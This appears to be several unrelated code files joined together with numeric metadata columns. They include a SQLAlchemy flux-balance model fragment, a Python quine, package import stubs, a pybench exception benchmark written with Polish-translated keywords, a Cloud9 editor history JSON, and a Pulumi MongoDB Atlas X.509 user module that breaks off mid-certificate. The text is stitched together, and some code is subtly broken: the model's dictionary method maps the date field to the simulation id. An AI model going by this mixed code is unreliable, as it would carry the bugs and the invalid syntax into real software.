UniqueConstraint('simulation_id','met_id','simulation_dateAndTime','fba_method','flux_units',
'allow_loops',
'solver_id'),
)
def __init__(self,
row_dict_I,
):
self.flux_units=row_dict_I['flux_units'];
self.fba_shadowPrice=row_dict_I['fba_shadowPrice'];
self.fba_method=row_dict_I['fba_method'];
self.met_id=row_dict_I['met_id'];
self.simulation_dateAndTime=row_dict_I['simulation_dateAndTime'];
self.simulation_id=row_dict_I['simulation_id'];
self.comment_=row_dict_I['comment_'];
self.used_=row_dict_I['used_'];
self.fba_options=row_dict_I['fba_options'];
self.allow_loops=row_dict_I['allow_loops'];
self.solver_id=row_dict_I['solver_id'];
def __set__row__(self,simulation_id_I,
simulation_dateAndTime_I,
met_id_I,
fba_shadowPrice_I,
fba_method_I,
allow_loops_I,
fba_options_I,
solver_id_I,
flux_units_I,
used__I,comment__I):
self.simulation_id=simulation_id_I
self.simulation_dateAndTime=simulation_dateAndTime_I;
self.met_id=met_id_I
self.fba_shadowPrice=fba_shadowPrice_I
self.fba_method=fba_method_I
self.allow_loops=allow_loops_I
self.fba_options=fba_options_I
self.solver_id=solver_id_I
self.flux_units=flux_units_I
self.used_=used__I
self.comment_=comment__I
def __repr__dict__(self):
return {'id':self.id,
'simulation_id':self.simulation_id,
'simulation_dateAndTime':self.simulation_id,
'met_id':self.met_id,
'fba_shadowPrice':self.fba_shadowPrice,
'fba_method':self.fba_method,
'allow_loops':self.allow_loops,
'fba_options':self.fba_options,
'solver_id':self.solver_id,
'flux_units':self.flux_units,
'used_':self.used_,
'comment_':self.comment_}
def __repr__json__(self):
return json.dumps(self.__repr__dict__())
| 39.153333
| 110
| 0.619275
| 1,428
| 11,746
| 4.545518
| 0.04902
| 0.051764
| 0.059159
| 0.062856
| 0.850562
| 0.820829
| 0.779233
| 0.779233
| 0.726853
| 0.707595
| 0
| 0.008883
| 0.281202
| 11,746
| 300
| 111
| 39.153333
| 0.759919
| 0.000851
| 0
| 0.706093
| 0
| 0
| 0.141616
| 0.054533
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057348
| false
| 0
| 0.003584
| 0.028674
| 0.308244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c87cf00f810cec8d65791a0a7c04caff8a9b5f1f
| 55
|
py
|
Python
|
lang/Python/quine-3.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/quine-3.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/quine-3.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
x = 'x = {!r};print(x.format(x))';print((x.format(x)))
| 27.5
| 54
| 0.527273
| 11
| 55
| 2.636364
| 0.363636
| 0.413793
| 0.827586
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 55
| 1
| 55
| 55
| 0.58
| 0
| 0
| 0
| 0
| 0
| 0.490909
| 0.418182
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c8fd620ee077d9d7f5ba2afdcc5917fd60d38f18
| 175
|
py
|
Python
|
tf_model_zoo/__init__.py
|
NeuralNetworkLab/Stream-Fusion-Network
|
5c3f4300131c9baa8f34d9c18a0dfd61445bd3b5
|
[
"BSD-2-Clause"
] | 240
|
2018-03-28T12:00:28.000Z
|
2022-02-02T15:27:02.000Z
|
tf_model_zoo/__init__.py
|
NeuralNetworkLab/Stream-Fusion-Network
|
5c3f4300131c9baa8f34d9c18a0dfd61445bd3b5
|
[
"BSD-2-Clause"
] | 5
|
2018-08-29T01:34:20.000Z
|
2020-11-07T16:21:13.000Z
|
tf_model_zoo/__init__.py
|
NeuralNetworkLab/Stream-Fusion-Network
|
5c3f4300131c9baa8f34d9c18a0dfd61445bd3b5
|
[
"BSD-2-Clause"
] | 37
|
2018-05-02T02:41:52.000Z
|
2021-09-24T18:08:57.000Z
|
from .inceptionresnetv2.pytorch_load import inceptionresnetv2
from .inceptionv4.pytorch_load import inceptionv4
from .bninception.pytorch_load import BNInception, InceptionV3
| 43.75
| 62
| 0.885714
| 19
| 175
| 8
| 0.421053
| 0.217105
| 0.335526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030864
| 0.074286
| 175
| 3
| 63
| 58.333333
| 0.907407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cdd5620255d7484f6848cec228994612f3c45cfc
| 14,679
|
py
|
Python
|
Tools/pybench/Exceptions.py
|
sireliah/polish-python
|
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
|
[
"PSF-2.0"
] | 1
|
2018-06-21T18:21:24.000Z
|
2018-06-21T18:21:24.000Z
|
Tools/pybench/Exceptions.py
|
sireliah/polish-python
|
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
|
[
"PSF-2.0"
] | null | null | null |
Tools/pybench/Exceptions.py
|
sireliah/polish-python
|
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
|
[
"PSF-2.0"
] | null | null | null |
z pybench zaimportuj Test
klasa TryRaiseExcept(Test):
version = 2.0
operations = 2 + 3 + 3
rounds = 80000
def test(self):
error = ValueError
dla i w range(self.rounds):
spróbuj:
podnieś error
wyjąwszy:
dalej
spróbuj:
podnieś error
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
spróbuj:
podnieś error("something")
wyjąwszy:
dalej
def calibrate(self):
error = ValueError
dla i w range(self.rounds):
dalej
klasa TryExcept(Test):
version = 2.0
operations = 15 * 10
rounds = 150000
def test(self):
dla i w range(self.rounds):
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
spróbuj:
dalej
wyjąwszy:
dalej
def calibrate(self):
dla i w range(self.rounds):
dalej
### Test to make Fredrik happy...
jeżeli __name__ == '__main__':
zaimportuj timeit
timeit.TestClass = TryRaiseExcept
timeit.main(['-s', 'test = TestClass(); test.rounds = 1000',
'test.test()'])
| 20.97
| 64
| 0.30656
| 738
| 14,679
| 6.086721
| 0.056911
| 0.457257
| 0.694568
| 0.834817
| 0.949688
| 0.934105
| 0.934105
| 0.921193
| 0.90984
| 0.892476
| 0
| 0.005281
| 0.664623
| 14,679
| 699
| 65
| 21
| 0.90717
| 0.001976
| 0
| 0.981763
| 0
| 0
| 0.007715
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.00304
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
b547b0511d7a31d644aaaa22ae8bbb986147ee68
| 139
|
py
|
Python
|
pula/__init__.py
|
dkfulp/PULA
|
67f317a73ab57378b67f5ffdc28d8e68a18c82db
|
[
"MIT"
] | 1
|
2018-04-24T18:26:32.000Z
|
2018-04-24T18:26:32.000Z
|
pula/__init__.py
|
dkfulp/PULA
|
67f317a73ab57378b67f5ffdc28d8e68a18c82db
|
[
"MIT"
] | 1
|
2018-04-24T17:56:20.000Z
|
2018-04-24T17:56:20.000Z
|
pula/__init__.py
|
dkfulp/pula
|
67f317a73ab57378b67f5ffdc28d8e68a18c82db
|
[
"MIT"
] | null | null | null |
from pula.numeric_functions import *
from pula.file_functions import *
from pula.hack_functions import *
from pula.data_structures import *
| 34.75
| 36
| 0.834532
| 20
| 139
| 5.6
| 0.45
| 0.285714
| 0.508929
| 0.616071
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107914
| 139
| 4
| 37
| 34.75
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
b58029001468b92c2eba9fb2082e6ab649d380b5
| 2,706
|
py
|
Python
|
.c9/metadata/workspace/uvaschedule_me/forms.py
|
nathan-williams/uvaschedule_me
|
504733dcceca9d8ec15a467983e8b3cea1af09aa
|
[
"MIT"
] | null | null | null |
.c9/metadata/workspace/uvaschedule_me/forms.py
|
nathan-williams/uvaschedule_me
|
504733dcceca9d8ec15a467983e8b3cea1af09aa
|
[
"MIT"
] | null | null | null |
.c9/metadata/workspace/uvaschedule_me/forms.py
|
nathan-williams/uvaschedule_me
|
504733dcceca9d8ec15a467983e8b3cea1af09aa
|
[
"MIT"
] | null | null | null |
{"filter":false,"title":"forms.py","tooltip":"/uvaschedule_me/forms.py","undoManager":{"stack":[[{"start":{"row":6,"column":0},"end":{"row":6,"column":4},"action":"remove","lines":[" "],"id":2}],[{"start":{"row":5,"column":226},"end":{"row":6,"column":0},"action":"remove","lines":["",""],"id":3}],[{"start":{"row":11,"column":38},"end":{"row":11,"column":39},"action":"insert","lines":["'"],"id":4}],[{"start":{"row":11,"column":39},"end":{"row":11,"column":40},"action":"insert","lines":["a"],"id":5}],[{"start":{"row":11,"column":40},"end":{"row":11,"column":41},"action":"insert","lines":["u"],"id":6}],[{"start":{"row":11,"column":41},"end":{"row":11,"column":42},"action":"insert","lines":["t"],"id":7}],[{"start":{"row":11,"column":42},"end":{"row":11,"column":43},"action":"insert","lines":["o"],"id":8}],[{"start":{"row":11,"column":43},"end":{"row":11,"column":44},"action":"insert","lines":["f"],"id":9}],[{"start":{"row":11,"column":44},"end":{"row":11,"column":45},"action":"insert","lines":["o"],"id":10}],[{"start":{"row":11,"column":45},"end":{"row":11,"column":46},"action":"insert","lines":["c"],"id":11}],[{"start":{"row":11,"column":46},"end":{"row":11,"column":47},"action":"insert","lines":["u"],"id":12}],[{"start":{"row":11,"column":47},"end":{"row":11,"column":48},"action":"insert","lines":["s"],"id":13}],[{"start":{"row":11,"column":48},"end":{"row":11,"column":49},"action":"insert","lines":["'"],"id":14}],[{"start":{"row":11,"column":49},"end":{"row":11,"column":50},"action":"insert","lines":[":"],"id":15}],[{"start":{"row":11,"column":50},"end":{"row":11,"column":51},"action":"insert","lines":["'"],"id":16}],[{"start":{"row":11,"column":51},"end":{"row":11,"column":52},"action":"insert","lines":["t"],"id":17}],[{"start":{"row":11,"column":52},"end":{"row":11,"column":53},"action":"insert","lines":["r"],"id":18}],[{"start":{"row":11,"column":53},"end":{"row":11,"column":54},"action":"insert","lines":["u"],"id":19}],[{"start":{"row":11,"column":54},"end":{"row":11,"column":55},"action":"insert","lines":["e"],"id":20}],[{"start":{"row":11,"column":55},"end":{"row":11,"column":56},"action":"insert","lines":["'"],"id":21}],[{"start":{"row":11,"column":56},"end":{"row":11,"column":57},"action":"insert","lines":[","],"id":22}],[{"start":{"row":11,"column":57},"end":{"row":11,"column":58},"action":"insert","lines":[" "],"id":23}]],"mark":21,"position":21},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":9,"column":39},"end":{"row":9,"column":39},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1432071634000,"hash":"d118a019da0eaab393f9e8ee50867df3349775f6"}
| 2,706
| 2,706
| 0.558758
| 391
| 2,706
| 3.86445
| 0.232737
| 0.132363
| 0.291198
| 0.21178
| 0.092654
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09515
| 0.001848
| 2,706
| 1
| 2,706
| 2,706
| 0.464272
| 0
| 0
| 0
| 0
| 0
| 0.469893
| 0.023642
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b581db92ddffc0fc1c94a0613e7a85307609b8f4
| 24,524
|
py
|
Python
|
sdk/python/pulumi_mongodbatlas/x509_authentication_database_user.py
|
pulumi/pulumi-mongodbatlas
|
0d5c085dcfd871b56fb4cf582620260b70caa07a
|
[
"ECL-2.0",
"Apache-2.0"
] | 9
|
2020-04-28T19:12:30.000Z
|
2022-03-22T23:04:46.000Z
|
sdk/python/pulumi_mongodbatlas/x509_authentication_database_user.py
|
pulumi/pulumi-mongodbatlas
|
0d5c085dcfd871b56fb4cf582620260b70caa07a
|
[
"ECL-2.0",
"Apache-2.0"
] | 59
|
2020-06-12T12:12:52.000Z
|
2022-03-28T18:14:50.000Z
|
sdk/python/pulumi_mongodbatlas/x509_authentication_database_user.py
|
pulumi/pulumi-mongodbatlas
|
0d5c085dcfd871b56fb4cf582620260b70caa07a
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-09-25T21:22:08.000Z
|
2021-08-30T20:06:18.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['X509AuthenticationDatabaseUserArgs', 'X509AuthenticationDatabaseUser']
@pulumi.input_type
class X509AuthenticationDatabaseUserArgs:
def __init__(__self__, *,
project_id: pulumi.Input[str],
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a X509AuthenticationDatabaseUser resource.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
:param pulumi.Input[int] months_until_expiration: A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
pulumi.set(__self__, "project_id", project_id)
if customer_x509_cas is not None:
pulumi.set(__self__, "customer_x509_cas", customer_x509_cas)
if months_until_expiration is not None:
pulumi.set(__self__, "months_until_expiration", months_until_expiration)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
Identifier for the Atlas project associated with the X.509 configuration.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="customerX509Cas")
def customer_x509_cas(self) -> Optional[pulumi.Input[str]]:
"""
PEM string containing one or more customer CAs for database user authentication.
"""
return pulumi.get(self, "customer_x509_cas")
@customer_x509_cas.setter
def customer_x509_cas(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_x509_cas", value)
@property
@pulumi.getter(name="monthsUntilExpiration")
def months_until_expiration(self) -> Optional[pulumi.Input[int]]:
"""
A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
"""
return pulumi.get(self, "months_until_expiration")
@months_until_expiration.setter
def months_until_expiration(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "months_until_expiration", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
Username of the database user to create a certificate for.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
@pulumi.input_type
class _X509AuthenticationDatabaseUserState:
def __init__(__self__, *,
certificates: Optional[pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]]] = None,
current_certificate: Optional[pulumi.Input[str]] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering X509AuthenticationDatabaseUser resources.
:param pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]] certificates: Array of objects where each details one unexpired database user certificate.
:param pulumi.Input[str] current_certificate: Contains the last X.509 certificate and private key created for a database user.
:param pulumi.Input[str] customer_x509_cas: PEM string containing one or more customer CAs for database user authentication.
:param pulumi.Input[int] months_until_expiration: A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
:param pulumi.Input[str] project_id: Identifier for the Atlas project associated with the X.509 configuration.
:param pulumi.Input[str] username: Username of the database user to create a certificate for.
"""
if certificates is not None:
pulumi.set(__self__, "certificates", certificates)
if current_certificate is not None:
pulumi.set(__self__, "current_certificate", current_certificate)
if customer_x509_cas is not None:
pulumi.set(__self__, "customer_x509_cas", customer_x509_cas)
if months_until_expiration is not None:
pulumi.set(__self__, "months_until_expiration", months_until_expiration)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def certificates(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]]]:
"""
Array of objects where each details one unexpired database user certificate.
"""
return pulumi.get(self, "certificates")
@certificates.setter
def certificates(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['X509AuthenticationDatabaseUserCertificateArgs']]]]):
pulumi.set(self, "certificates", value)
@property
@pulumi.getter(name="currentCertificate")
def current_certificate(self) -> Optional[pulumi.Input[str]]:
"""
Contains the last X.509 certificate and private key created for a database user.
"""
return pulumi.get(self, "current_certificate")
@current_certificate.setter
def current_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "current_certificate", value)
@property
@pulumi.getter(name="customerX509Cas")
def customer_x509_cas(self) -> Optional[pulumi.Input[str]]:
"""
PEM string containing one or more customer CAs for database user authentication.
"""
return pulumi.get(self, "customer_x509_cas")
@customer_x509_cas.setter
def customer_x509_cas(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_x509_cas", value)
@property
@pulumi.getter(name="monthsUntilExpiration")
def months_until_expiration(self) -> Optional[pulumi.Input[int]]:
"""
A number of months that the created certificate is valid for before expiry, up to 24 months. By default is 3.
"""
return pulumi.get(self, "months_until_expiration")
@months_until_expiration.setter
def months_until_expiration(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "months_until_expiration", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier for the Atlas project associated with the X.509 configuration.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def username(self) -> Optional[pulumi.Input[str]]:
"""
Username of the database user to create a certificate for.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "username", value)
class X509AuthenticationDatabaseUser(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
customer_x509_cas: Optional[pulumi.Input[str]] = None,
months_until_expiration: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
username: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
`X509AuthenticationDatabaseUser` provides a X509 Authentication Database User resource. The X509AuthenticationDatabaseUser resource lets you manage MongoDB users who authenticate using X.509 certificates. You can manage these X.509 certificates or let Atlas do it for you.
| Management | Description |
|---|---|
| Atlas | Atlas manages your Certificate Authority and can generate certificates for your MongoDB users. No additional X.509 configuration is required. |
| Customer | You must provide a Certificate Authority and generate certificates for your MongoDB users. |
> **NOTE:** Groups and projects are synonymous terms. You may find group_id in the official documentation.
## Example Usage
### S
### Example Usage: Generate an Atlas-managed X.509 certificate for a MongoDB user
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
user = mongodbatlas.DatabaseUser("user",
project_id="<PROJECT-ID>",
username="myUsername",
x509_type="MANAGED",
database_name="$external",
roles=[mongodbatlas.DatabaseUserRoleArgs(
role_name="atlasAdmin",
database_name="admin",
)],
labels=[mongodbatlas.DatabaseUserLabelArgs(
key="My Key",
value="My Value",
)])
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
project_id=user.project_id,
username=user.username,
months_until_expiration=2)
```
### Example Usage: Save a customer-managed X.509 configuration for an Atlas project
```python
import pulumi
import pulumi_mongodbatlas as mongodbatlas
test = mongodbatlas.X509AuthenticationDatabaseUser("test",
customer_x509_cas=\"\"\" -----BEGIN CERTIFICATE-----
MIICmTCCAgICCQDZnHzklxsT9TANBgkqhkiG9w0BAQsFADCBkDELMAkGA1UEBhMC
VVMxDjAMBgNVBAgMBVRleGFzMQ8wDQYDVQQHDAZBdXN0aW4xETAPBgNVBAoMCHRl
c3QuY29tMQ0wCwYDVQQLDARUZXN0MREwDwYDVQQDDAh0ZXN0LmNvbTErMCkGCSqG
SIb3DQEJARYcbWVsaXNzYS5wbHVua2V0dEBtb25nb2RiLmNvbTAeFw0yMDAyMDQy
